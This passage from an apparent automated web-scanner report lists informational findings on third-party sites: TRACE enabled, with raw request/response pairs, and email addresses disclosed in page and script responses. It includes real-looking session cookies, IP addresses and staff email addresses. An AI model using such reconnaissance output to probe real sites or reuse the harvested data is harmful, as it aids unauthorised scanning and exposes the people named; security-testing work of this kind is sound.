User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733993

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/
Content-Type: text/html
Content-Length: 23772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tresware Contact Us | Web Development | Web Design, Managed Web Hosting |
...[SNIP]...
<td class="pn-normal" style="padding: 4px 4px 0px 18px;"><script src="http://maps.google.com/?file=api&amp;v=2&amp;key=ABQIAAAAa9ZgLcup1atRScDnQZtsDxSRUe5SW-hZPzm6ZYpOuWXDOrFWMxRZ7jZ--8AFfSi7D6c-kDHI8ZVQ7g" type="text/javascript"></script>
...[SNIP]...

24. TRACE method is enabled  previous  next
There are 11 instances of this issue:


24.1. http://games.webalta.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.webalta.ru
Path:   /

Request

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: games.webalta.ru
Cookie: 7541cd9cdcfad52d


24.2. http://pixel.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.fetchback.com
Cookie: 8fd68d4270760e27


24.3. http://pixel.rubiconproject.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 92a50ef8257487f1
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


24.4. http://pl.yumenetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pl.yumenetworks.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:53:48 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.7a DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pl.yumenetworks.com
Cookie: 642a0b605693030e
X-Forwarded-For: 173.193.214.243


24.5. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: store.manageengine.com
Cookie: ed6a06f146e1b0da


24.6. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 3c84da3aceb8a596

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:07:30 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3c84da3aceb8a596
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.33
x-chpd-loop: 1
Via: 1.0 PXY020-ASHB.COTENDO.NET (chpd/3
...[SNIP]...

24.7. http://www.igotyourindex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.igotyourindex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.igotyourindex.com
Cookie: 14e0a6e706526fca


24.8. https://www.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.manageengine.com
Cookie: d1f59eb3c7958e9b


24.9. http://www.smpone.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smpone.com
Cookie: 7fd91fd5f1b454f7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.smpone.com
Cookie: 7fd91fd5f1b454f7


24.10. http://www.stillsecure.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:57:11 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stillsecure.com
Cookie: d8bd4fcc0d246f51


24.11. http://www.tresware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tresware.com
Cookie: e820d3df4b13e88f

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tresware.com
Cookie: e820d3df4b13e88f


25. Email addresses disclosed  previous  next
There are 41 instances of this issue:


25.1. http://customer.kronos.com/EdServices/tooltip.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://customer.kronos.com
Path:   /EdServices/tooltip.js

Issue detail

The following email address was disclosed in the response:

Request

GET /EdServices/tooltip.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: customer.kronos.com

Response

HTTP/1.1 200 OK
Content-Length: 7384
Content-Type: application/x-javascript
Last-Modified: Tue, 25 Mar 2008 19:41:19 GMT
Accept-Ranges: bytes
ETag: "5d378732b08ec81:1249"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 13:53:52 GMT

...<!--
/*
Pleas leave this notice.
DHTML tip message version 1.5.4 copyright Essam Gamal 2003
Home Page: (http://migoicons.tripod.com)
Email: (migoicons@hotmail.com)
Updated on :7/30/2003
*/

var MI_IE=MI_IE4=MI_NN4=MI_ONN=MI_NN=MI_pSub=MI_sNav=0;mig_dNav()
var Style=[],Text=[],Count=0,move=0,fl=0,isOK=1,hs,e_d,tb,w=window,PX=(MI_pSub)?"px":""
var d_r=(MI
...[SNIP]...

25.2. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<a href="mailto:support@direct.yandex.ru">
...[SNIP]...

25.3. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following email address was disclosed in the response:

Request

GET /hmc/report/?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</em> gm12345@MyCompany.com</TD>
...[SNIP]...

25.4. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</em> gm12345@MyCompany.com</TD>
...[SNIP]...

25.5. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.en25.com
Path:   /Web/KronosIncorporated/astadia-gated-forms-ver-3.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Web/KronosIncorporated/astadia-gated-forms-ver-3.js HTTP/1.1
Host: img.en25.com
Proxy-Connection: keep-alive
Referer: http://solutions.kronos.com/forms/experience2011
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 02:15:10 GMT
Accept-Ranges: bytes
ETag: "fb74f6d89f41cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 16182
Cache-Control: max-age=3600
Date: Mon, 25 Apr 2011 14:22:27 GMT
Connection: close


/* PRE-DFINED VARIABLES */
// v_email
// c_email
// c_isRegistered

// elqCookieDLKey
// elqContactDLKey
// elqProspectDLKey

// g_redir_host
// g_short_form_uri
// g_long_form_uri

//
...[SNIP]...
yle.left = '-1000px';

document.body.appendChild(io);

return io            
}


/***************************/
//@Author: Adrian "yEnS" Mato Gondelle
//@website: www.yensdesign.com
//@email: yensamg@gmail.com
//@license: Feel free to use it, but keep this credits please!                    
/***************************/

//SETTING UP OUR POPUP
//0 means disabled; 1 means enabled;
var popupStatus = 0;

//loading p
...[SNIP]...

25.6. http://l-stat.livejournal.com/js/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l-stat.livejournal.com
Path:   /js/

Issue detail

The following email address was disclosed in the response:

Request

GET /js/??jquery/jquery.ui.core.min.js,jquery/jquery.ui.widget.min.js,jquery/jquery.lj.bubble.js,contextualhover.js,stats.js,widgets/qotd.js,widgets/journalspotlight.js,widgets/photos2homepage.js,widgets/potd.js,widget_ippu/addvgift.js,widget_ippu/vgiftsmspay.js,widgets/shopvgift.js,inputcomplete.js,settingprod.js,widget_ippu/settingprod.js,horizon.js?v=1302809072 HTTP/1.1
Host: l-stat.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Perlbal
Content-Type: application/x-javascript
Cache-Control: public, max-age=31536000
ETag: HlATaNEjXLJzuO3FK0MglA
Vary: Accept-Encoding
Age: 930710
Date: Mon, 25 Apr 2011 14:29:19 GMT
Last-Modified: Thu, 14 Apr 2011 19:24:32 GMT
Expires: Fri, 13 Apr 2012 20:11:15 GMT
Connection: keep-alive
Content-Length: 74792

/*!
* jQuery UI 1.8.10
*
* Copyright 2011, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.co
...[SNIP]...
a];c[f]=c.originalEvent[f]}}this.element.trigger(c,d);return!(b.isFunction(e)&&e.call(this.element[0],c,d)===false||c.isDefaultPrevented())}}})(jQuery);
/*!
* LiveJournal Bubble
*
* Copyright 2011, sergey.zhirkov@sup.com
*
* http://docs.jquery.com/UI
*
* Depends:
*    jquery.ui.core.js
*    jquery.ui.widget.js
*
* Usage:
*    <script>
...[SNIP]...

25.7. http://learn.shavlik.com/shavlik/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/ HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                               
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...

25.8. http://learn.shavlik.com/shavlik/download.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/download.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/download.cfm?nFileID=407 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.4.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                   
...[SNIP]...
<div id=footer>Shavlik Technologies, LLC | Privacy Policy | Direct: (800) 690-6911, (651) 426-6624; Fax: (651) 426-3345; Support: (866) 407-5279; Email: sales@shavlik.com</div>
...[SNIP]...

25.9. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /shavlik/index.cfm?pg=341 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.5.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                   
...[SNIP]...
<a href="mailto:info@shavlik.com">info@shavlik.com</a>
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...

25.10. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<!--Rating@Mail.ru counter-->
...[SNIP]...
<!--// Rating@Mail.ru counter-->
...[SNIP]...

25.11. http://solutions.kronos.com/forms/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.kronos.com
Path:   /forms/experience2011

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forms/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Mon, 25 Apr 2011 14:59:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Last-Modfied: Mon, 25 Apr 2011 10:54:53 GMT
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:53 GMT
Content-Length: 52775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<input type="hidden" name="notificationEmailAddress" value="Nandini.Sen@kronos.com;Carol.Nowakowski@kronos.com;" />
...[SNIP]...

25.12. http://tengrinews.kz/static/js/browserTouchSupport.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/browserTouchSupport.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/browserTouchSupport.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:48 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Tue, 22 Feb 2011 05:08:59 GMT
ETag: "be08b-a10-49cd7fa5ad0c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2576

/*
* jQuery touch and gesture detection.
*
* identifies support for touch and gestures.
*
* Usage:
*
* if ($fn.browserTouchSupport.touches) {
* // Touch specific interactions
* }
*
...[SNIP]...
<jeff@tropicalpixels.com>
...[SNIP]...

25.13. http://tengrinews.kz/static/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tengrinews.kz
Path:   /static/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/jquery.cookie.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:20:49 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Mon, 01 Nov 2010 19:25:45 GMT
ETag: "be2e6-1096-49402c652c040"
Accept-Ranges: bytes
Vary: Accept-Encoding
